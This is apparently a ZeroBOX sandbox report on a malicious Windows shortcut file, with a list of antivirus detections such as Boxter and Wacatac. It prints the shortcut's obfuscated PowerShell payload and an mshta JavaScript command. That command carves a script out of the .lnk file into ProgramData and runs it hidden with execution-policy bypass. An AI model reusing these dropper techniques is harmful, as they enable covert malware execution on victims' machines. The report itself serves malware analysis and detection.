popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Windows
System32
mshta.exe
C:\Windows\System32\mshta.exe
0GmaY|
C&;Grw{
)'-Fo
desktop-6ko8d2u
$gl82=@();$egi0="moqSpQD7IyMyMjdmV2ci0TdyMHJswz"[26..3];$cfk1="yepzYnASblRXStUmdv1WZksacd"[20..2];$egi2="morYk1WYyd2byBHXcuyae"[16..3];$ins3="jq7cSMzBnLoxFXhRXyacde"[16..2];$gikl4=$egi0+$cfk1+$egi2+$ins3;$gl82+=$gikl4 -join '';$lv="ase64S";$aei5="yekFX6MEI0BXansyJyN2chZXYqpzJrcSZv8CIi9yLgUGel5Cdwl2JrcicjN3dcxlMzcyKn0WZ0NXezxFXzd3J9EzYptGJ7cGJgM2LgQWbjtzJm9CIiAXb05SN0UjNywFXhRXYE1WYyd2bnsyJyBFXcpzQgI2LvACdwl2JrcicjNXY2dyKnEma6U2LvACdwlmcjdyKnM3diAic09CIddzM3gTO0MjM5czWnsyJn5Wak5WYwhXRnsyJlRXYkBXVldGZnsyJFRnZvN3byNWansyJNdUQg4GdvAiMg8WbvASZ0Vnbp1GIjN3LgUGdhVmcj9CIzt2JrcychRHajN3Jg0DInRCIJoQDgkgCNsDawhXZkACRtAiZyMDM212bmV2ckACa0FGUtASZ2lGajJXQtQmbhBHeFtjIhRXYk1WYyd2byBFXcpzQiASPggGc4VGJ70nZyMDM212bmV2c7RCIlxWaGRXdP1CI9Z3c2R2ekASKncVLlt2Jscyb25WSnwyJ0NXZ1F3JscSZSJWZnAiZtISfxsXfwsXfzsXfysnIo4yOiAXa65ycnxFXhRXYk1WYyJyKic2byBHXcpzYiASPgYmMzAjdt9mZlNHJ7lnc0BSCK0AIJoQD7ISM9wGZmgnN0tWO3g2N9Q3cmc2cyJHc4gTY5d2b4BXMwMDaupmZyR3ajFXP5V2asJ3P0FGZu02UvcTMvNHa0VzMnl3N54WarpnMplTa38Sam9CbjN3Lt92Yug3biJyKiA3byRmL3d3dv8iOzBnIrICd
Windows
@System32
mshta.exe
n..\..\..\Windows\System32\mshta.exe
javascript:g="c:\\prog"+"ramdata\\";m=" -Encod"+"ing Byte;sc ";a="rshell -ep bypa"+"ss ";p="$w ([byte[]]($f | select -Skip 0x0976)) -Force";s="a=new Activ"+"eXObject('WScr"+"ipt.Shell');a.Run(c,0,true);close();";c="powe"+a+"-c $t=0x19c6;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -Expan"+"dProperty Name;if($k.c"+"ount -eq 0){$k=Get-ChildItem $env:TEMP\\*\\*.lnk | where-object{$_.length -eq $t};};$w='"+g+"h.ps1';$f=gc $k"+m+p+m+g+"41026 0;"+"powe"+a+"-f $w;";eval(s);
System32 (C:\Windows)
S-1-5-21-1840914918-3743596314-2189714932-1002
mshta.exe
Application
C:\Windows\System32\mshta.exe
Antivirus Signature
Bkav Clean
Lionic Trojan.WinLNK.Boxter.4!c
ClamAV Clean
CTX lnk.trojan.generic
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.Agent.LNK.Gen
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong Trojan/LNK.Starter.bj
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 LNK/Agent.AHC
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan.Multi.Runner.c
BitDefender Heur.BZC.UGZ.Boxter.1.694738B5
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.UGZ.Boxter.1.694738B5
Tencent Win32.Trojan.Runner.Dtgl
Sophos Troj/LnkObf-AV
F-Secure Trojan:W32/LnkGen.C
DrWeb Clean
VIPRE Heur.BZC.UGZ.Boxter.1.694738B5
TrendMicro Clean
CMC Clean
Emsisoft Heur.BZC.UGZ.Boxter.1.694738B5 (B)
Ikarus Win32.Outbreak
GData Heur.BZC.UGZ.Boxter.1.694738B5
Jiangmin Clean
Varist LNK/ABTrojan.QTFZ-
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.UGZ.Boxter.1.694738B5
SUPERAntiSpyware Clean
ZoneAlarm Troj/LnkObf-AV
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.LNKScript
Rising Trojan.Agent/LNK!8.197F2 (TOPIS:E0:AapaztxiTlP)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet LNK/Agent.AHC!tr
AVG Clean
Panda Clean
alibabacloud Trojan:Win/Wacatac.C9nj
No IRMA results available.